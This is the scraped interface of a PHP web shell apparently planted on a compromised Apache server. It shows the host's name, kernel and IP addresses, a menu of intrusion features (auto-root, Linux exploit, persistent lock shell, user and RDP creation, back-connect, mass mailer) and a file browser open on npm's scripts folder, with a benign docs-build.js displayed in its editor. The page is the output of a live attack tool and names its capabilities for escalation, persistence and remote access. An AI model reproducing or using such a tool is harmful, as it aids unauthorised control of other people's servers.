Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.js
3
KB
-rw-r--r--
clean-old.sh
4.17
KB
-rwxr-xr-x
dep-update
207
B
-rwxr-xr-x
dev-dep-update
205
B
-rwxr-xr-x
docs-build.js
823
B
-rw-r--r--
gen-changelog
420
B
-rwxr-xr-x
gen-dev-ignores.js
299
B
-rw-r--r--
install.sh
5.47
KB
-rwxr-xr-x
maketest
1.8
KB
-rwxr-xr-x
pr
3.96
KB
-rwxr-xr-x
publish-tag.js
151
B
-rw-r--r--
release.sh
719
B
-rw-r--r--
relocate.sh
673
B
-rwxr-xr-x
update-authors.sh
197
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docs-build.js
#!/usr/bin/env node var fs = require('fs') var marked = require('marked-man') var npm = require('../lib/npm.js') var args = process.argv.slice(2) var src = args[0] var dest = args[1] || src fs.readFile(src, 'utf8', function (err, data) { if (err) return console.log(err) function replacer (match, p1) { return 'npm help ' + p1.replace(/npm /, '') } var result = data.replace(/@VERSION@/g, npm.version) .replace(/---([\s\S]+)---/g, '') .replace(/\[([^\]]+)\]\(\/cli-commands\/([^)]+)\)/g, replacer) .replace(/\[([^\]]+)\]\(\/configuring-npm\/([^)]+)\)/g, replacer) .replace(/\[([^\]]+)\]\(\/using-npm\/([^)]+)\)/g, replacer) .replace(/(# .*)\s+(## (.*))/g, '$1 - $3') .trim() fs.writeFile(dest, marked(result), 'utf8', function (err) { if (err) return console.log(err) }) })
Close